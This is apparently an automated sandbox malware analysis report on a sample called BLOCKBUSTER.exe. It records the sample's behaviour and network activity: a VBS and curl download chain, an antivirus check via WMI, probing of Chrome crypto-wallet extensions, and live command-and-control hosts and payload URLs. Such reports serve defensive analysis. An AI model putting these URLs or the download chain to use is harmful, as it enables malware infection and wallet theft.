Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Uses taskkill to terminate processes

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe

Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000006E3C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWndStartU
Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000006E3C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWndU

Contains functionality to query locales information (e.g. system language)

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: GetLocaleInfoA,

14_2_6FCF2D4C

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCEB37A GetSystemTimeAsFileTime,

14_2_6FCEB37A

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCF070D InitializeCriticalSectionAndSpinCount,GetVersion,

14_2_6FCF070D

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\_672365339188b\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Tries to access browser extension known for cryptocurrency wallets

Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
213.188.196.246	worldtimeapi.org	Italy	25400	TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO	false
68.65.122.45	endesa.click	United States	22612	NAMECHEAP-NETUS	false
70.34.247.142	tgb5255365e.servegame.com	United States	19529	RAZOR-PHLUS	true
64.95.10.38	unknown	United States	31982	BRAHMAN-NYUS	true

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
endesa.click	68.65.122.45	true
worldtimeapi.org	213.188.196.246	true
tgb5255365e.servegame.com	70.34.247.142	true

Contacted URLs

Name	Malicious	Reputation
https://endesa.click/672365339188b/6723653391970.vbs	false	unknown
http://tgb5255365e.servegame.com:2530/	true	unknown
http://64.95.10.38/wewewe.zip	true	unknown
http://64.95.10.38/contador/index.php?nomepc=user-PC	true	unknown

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\hcx.dll

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 83.6% probability

Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000008AC0000.00000020.00000001.01000000.0000000B.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_b46a6645-7

Source: unknown

HTTPS traffic detected: 68.65.122.45:443 -> 192.168.2.6:49712 version: TLS 1.2

Source:	Binary string: wkernel32.pdb source: BLOCKBUSTER.exe, 0000000E.00000003.2349989495.000000000D5C4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: BLOCKBUSTER.exe, 0000000E.00000002.2569344059.000000006FCF5000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wkernel32.pdbUGP source: BLOCKBUSTER.exe, 0000000E.00000003.2349989495.000000000D5C4000.00000004.00001000.00020000.00000000.sdmp

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCDC2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,

14_2_6FCDC2D0

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\curl.exe

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 64.95.10.38 80

Jump to behavior

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 70.34.247.142 ports 0,2,3,443,5,2530

Potential malicious VBS script found (has network functionality)

Source: C:\Windows\System32\curl.exe	Dropped file: adodbStream.Write xmlhttp.ResponseBody			Jump to dropped file
Source: C:\Windows\System32\curl.exe	Dropped file: adodbStream.SaveToFile destinationFolder & "\downloaded.zip", 2			Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49950

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49809 -> 70.34.247.142:2530

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: aaGv8t/cYOIYaK+ezrdpkg==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: 0JzSPu5zfi7XAIhfH96wSg==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: NQjoum4smcb9bygYQEmS8Q==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: POST /$rdgate?ACTION=HELLO HTTP/1.1HOST: TGB5255365E.SERVEGAME.COMCONTENT-LENGTH: 7249Data Raw: 30 0b ec 98 81 56 fc b8 db a2 a5 49 11 86 e7 02 62 f6 df 15 bb b3 55 56 0e 7f 00 0e 13 0c ff 09 c7 53 1e 71 e3 41 50 1e 0e 46 b7 88 fc 57 3a d3 b9 cf 2e c3 0a fe 15 3e 61 d3 6b a5 f1 34 10 b2 75 a1 ec 35 ba c5 de a3 b9 17 be 72 81 53 bc bc 48 91 cb 22 6d 37 18 73 50 87 cc 3b bc 91 81 e7 1a c8 67 c5 50 79 cb 75 c2 52 ac da 99 ef 9a 40 48 e7 cf 2e 97 5e a8 b9 8b b7 1d ed 8c 76 94 b5 a4 b9 89 38 bb af 11 bd b9 f6 05 f9 c2 7f 34 ba 11 09 31 9a 42 ac a6 85 e3 67 72 51 a2 a7 d1 b9 8e 95 5f c4 f9 c1 6a de ca 04 eb 5f 7c 79 ed 7d 96 85 27 29 d1 c9 af 25 a1 d3 34 21 26 ea e8 01 42 88 6a 4c 95 df c7 2f e2 28 ef d8 5f 75 45 2c 95 f1 ec 26 b3 c8 23 d0 ab 18 95 17 77 8f 8f 7b e8 5b e2 47 db a7 a4 6a eb b4 37 74 7b f8 22 4f ae a2 82 b7 32 a4 fb dd ec 19 7b 0f 7e 15 24 39 95 7a c6 f4 c4 f2 d7 ba 53 0b 49 a9 2c 00 89 5d 1f 07 03 30 75 e9 f3 81 64 e2 c0 85 41 fc 70 3e 47 bd 41 61 0e 56 bf bf 83 1c 9f e4 d7 69 a7 6a e9 96 30 b5 c1 38 1b 68 52 4e 37 99 32 99 36 55 57 7b f9 d8 cc 2a 73 f8 27 70 f5 3c 55 5c f4 02 32 9d 95 c1 e0 f4 6b d5 5d 53 e1 93 7d a0 d2 cb 95 5c d8 8b ab 41 51 0b b3 79 4e 42 a9 ff ba c3 87 b5 81 29 b4 b6 a4 e7 40 b2 05 e9 f0 28 23 f2 bc b8 e3 a0 fd 0d b5 a2 92 c8 19 fb e7 13 8b 65 7e 7d eb 2e cf 55 2b ff 6b 50 ca 0f e4 37 5f e7 88 07 95 fc c2 4e e2 fb e5 1f c0 21 34 88 b2 21 d2 35 0d d4 6c 4d db 9c 49 13 5a 52 d1 df 48 06 c0 c5 99 67 99 44 76 98 34 df b8 16 11 0b ee e4 4e 29 89 39 03 6c c0 8b b4 ba a0 95 3d c7 16 13 ef 32 01 dd fb 20 7e 27 bd 3b 7c 0e 78 68 a0 26 8b 2d eb 50 6c 17 c2 c2 0d 17 c4 99 10 50 ca 5e 84 0b 8e f2 e9 79 20 c7 81 ef c6 f7 9b 0f 71 26 41 74 3f 9a a7 1b 82 98 56 f0 df d2 37 cf ea 93 7d 43 89 66 4e a3 43 0b f4 da ec 44 ad d6 d2 5d 31 32 79 77 01 b7 7d cd a9 1c 9d 7b 1f b1 ef 38 21 b3 37 9c 17 a3 cb 22 af 76 91 ee 2c e8 b1 7a 52 0d 89 4b 08 1c e2 b1 a2 f4 c6 fb 8b 45 31 86 9b a0 1b c1 7a f0 fb 2f 5d 4e 8b 54 57 3a d4 29 ab 26 d8 58 01 a4 2a d8 35 a2 4e 60 fc 36 92 d3 9d 23 2c 8c a3 de 43 65 75 3f 54 b3 ff cb d2 b4 38 31 d5 67 26 89 96 93 ca 73 7f 35 a5 3c 78 f8 c0 e9 bd 15 ce 1e 79 89 ff ac 8c a8 9a a1 ec 5b 79 39 74 da bb 54 9f 02 c6 e0 c4 b1 7a f4 4e 53 ba 5f 85 08 96 1c 86 5b 62 90 03 06 c2 9e 68 ca 46 96 7d d6 be 81 27 40 e9 03 26 16 38 87 40 43 0f a9 ff 83 ce 00 99 6e 27 60 e6 af f9 5d c7 56 9f 42 e7 ec 71 f2 0c b4 b5 da a0 b7 4c 0a 84 99 36 43 2b 11 c2 56 a8 71 1a e4 42 fe ab a0 90 de 2d 32 22 45 fe a3 e7 3f 80 a2 46 96 5a ff 17 09 b9 14 0f 33 46 f7 8d 99 d7 ce e1 98 e5 d1 df ff 5c 26 57 53 88 11 8d cd ef 5d a0 29 76 1b a4 6b ff b8 c3 ab 50 3e 8c 8d 50 4f 51 b6 45 93 b7 ba 4c db db 37 a2 65 41 0f 83 c9 69 7d d9 e1 c6 45 5b c3 ec 57 91 94 9e ea 20 b5 13 14 5d 20 86 52 38 ce 44 3f 78 ba 4e 7b 87 be ef 5c cf ef b3 bd b6 14 7c 75 a8 19 ea a1 33 60 91 3d 47 44 48 8f 1c a1 99 70 9e 17 cd ee 1c 34 d3 c3 9f 3f c2 39 7d 70 fc d2 5a 3c 78 df 36 3f 54 02 4d 31 ae 85 08 35 be 5d 87 fc 98 8b 5d e1 56 be 00 a2 2f 77 8c 75 9e e3 3b f5
Source: global traffic	HTTP traffic detected: POST /$rdgate?ACTION=HELLO HTTP/1.1HOST: TGB5255365E.SERVEGAME.COMCONTENT-LENGTH: 7247Data Raw: 47 14 1b b1 ff f4 ff 33 eb d0 02 71 0d 37 73 ed 6b 0a 38 7a c6 dd 9f 86 77 64 ac bf 7c bc 6d 89 a0 97 97 42 64 8a 55 cf 67 b5 62 7f 33 36 ee 07 c9 f0 6c 82 72 58 cc 80 39 ae ca 81 10 c2 51 cd 8b 59 a0 af cf 7a 4a ea 56 8c a3 fe 62 3f cc 07 e0 1d fe e3 e2 50 f8 ce ee 9e 1c ef ad c6 a4 07 c5 ce 82 84 79 d0 db c4 27 5e 12 74 5e ef ca b1 b7 65 93 b8 ad 6f 6f 7c c8 89 4d 4c dd 8e db e8 fe d3 2c 48 f8 b9 ac 88 e9 d9 09 c7 44 21 2e 6b a4 9f d4 eb 13 0a 8a 02 61 2c 7b 3f 11 ae 52 28 fc 92 52 e8 ed 44 a5 fc bb a7 92 c3 06 81 98 0e c2 1f 2c fd 11 3a b2 6a e1 70 64 be df 95 0c ba b6 fe 08 56 d6 5e 25 d1 61 13 bb b3 22 35 ce eb 0e 68 35 fe 2f ce 08 11 8e ab 2a f0 f4 3f 0a 7f f2 c2 1c c4 85 a6 ed 30 e1 43 36 b9 37 b9 00 70 74 67 bd e0 d5 e9 89 9a 7b 53 0c dc 5d 7b 79 00 a7 d2 45 d3 55 20 b2 91 34 a8 ed ad 19 1d 20 ea 51 31 ed 56 d0 57 b7 7f ae 58 34 66 38 23 67 cf 9f a1 8b 52 f1 52 8a a4 0d 12 a0 b2 b8 df a7 5f cc f2 ae 56 08 27 5e a5 5d fa 7e 76 ed 46 a0 81 e9 bf 30 34 3d 2e 07 f5 35 79 43 9b 44 a8 06 98 b1 33 99 5e 90 f6 f7 23 9c ac 6e 37 00 38 8a b2 12 ae fa 36 3f 1a d7 ff 9f 0b a9 9d 78 f6 65 c0 68 d2 64 e0 2d 00 98 7d 59 c2 7f f3 5f a0 e4 08 2f 39 23 2d c1 26 ed 3c a5 52 0d 8d 5a 7c 12 7f ca 3f e1 15 5b 71 38 37 99 69 c0 47 fe 41 fd a1 2a 5a 6c 98 6d fc a9 22 84 69 75 34 36 66 dd 05 9a cb e0 8e 60 14 3e 80 19 b3 a4 ba 39 c3 dc f7 39 84 da 12 2c 70 1f 18 3e ae d1 cb d8 45 8d 5d 6f c8 07 69 9e 46 65 ff aa 88 3f f6 83 30 32 be 65 76 3c 09 9c 18 4e 4c bf 9a 07 57 55 15 4f c5 83 20 c1 c5 70 4f c2 c1 68 54 8b c0 a5 0c db be 04 6f d1 02 6f 7d 15 72 2f 94 22 b9 9d 82 00 fa 6c cf 84 f4 1d 45 3b 59 12 f0 f8 f9 ea 8b 36 34 43 12 7c fa 3e a4 72 5d 2b f1 60 12 d2 85 4a ee 55 26 ca 34 68 8b 97 16 21 28 df 82 52 3e c3 b9 b4 75 f8 d0 b9 e2 07 46 15 ee 74 2f 59 af 55 16 ba 5c f8 34 d6 1d 50 6b 78 27 21 0b 27 71 d2 bc e3 03 74 a3 5e 10 e1 42 15 bd 65 7a 89 0c 9a ba 26 ec b4 7b 8e b7 9b e3 51 29 1f 30 8f 6b 73 43 83 f6 e7 f7 5c 0f ad 1d 67 08 1b 49 7d ca 13 d6 57 32 b3 d5 4b be da 92 93 0c 50 5e 71 56 8f 0a 3b 2a 2e 8c 5d 8b d7 c6 d5 85 6f bb 2a df 5c 0c e0 5c 62 b3 53 81 41 cc 54 0c 1e 4a 26 23 a2 60 1b c0 20 ca 0d be f3 94 96 59 5f 8f b2 c7 2b 0b 1e 9d f0 89 a9 8a 7d 55 48 e9 09 f0 f2 eb 6c 70 96 a6 c7 97 57 9e 27 5b 17 97 ba 8f 29 60 38 02 ad 9f 9d 4c 7c fe 31 a8 9a fa a1 9c 1e ff 0b 7c 2a 86 44 65 86 e0 1e ab 0c 83 57 ce 40 1f 4b 39 c6 a0 31 a9 0e 04 ed 75 a4 94 35 06 f0 22 46 fe 0f 03 ff ce 65 34 20 0a bc a4 eb c8 9e cb 37 22 da 40 29 71 31 e7 5e 7a 8a 84 a4 8f ce 14 a4 5c 04 12 26 40 7f 76 0f 8a 2a 1e fd 97 4b d7 fc 96 c8 f9 77 a9 6b 7e 0c db a4 a7 3a 66 f6 47 92 7b 3f 3d b8 78 fd 8a 28 0c 4f 00 a6 3b 7a 1a 98 8c c4 b9 05 4a 74 6c 68 e1 a8 a2 43 fe 4a 6d ef 88 00 0f dc 6d 5a 24 83 af 81 0d 6a 5c bb d1 3c 72 d0 f5 46 42 35 f3 84 7e 40 40 c8 54 e7 d4 64 db 1b 55 3a 17 03 f6 1d 4e cc 41 fa a5 4f 6c 7d bf d6 7e 45 c1 fb 7f 84 52 96 e3 6d 44 08 c1 55 90 8d 61 8b 56 44 2f

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View	IP Address: 213.188.196.246 213.188.196.246

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: RAZOR-PHLUS RAZOR-PHLUS

JA3 SSL client fingerprint seen in connection with other malware

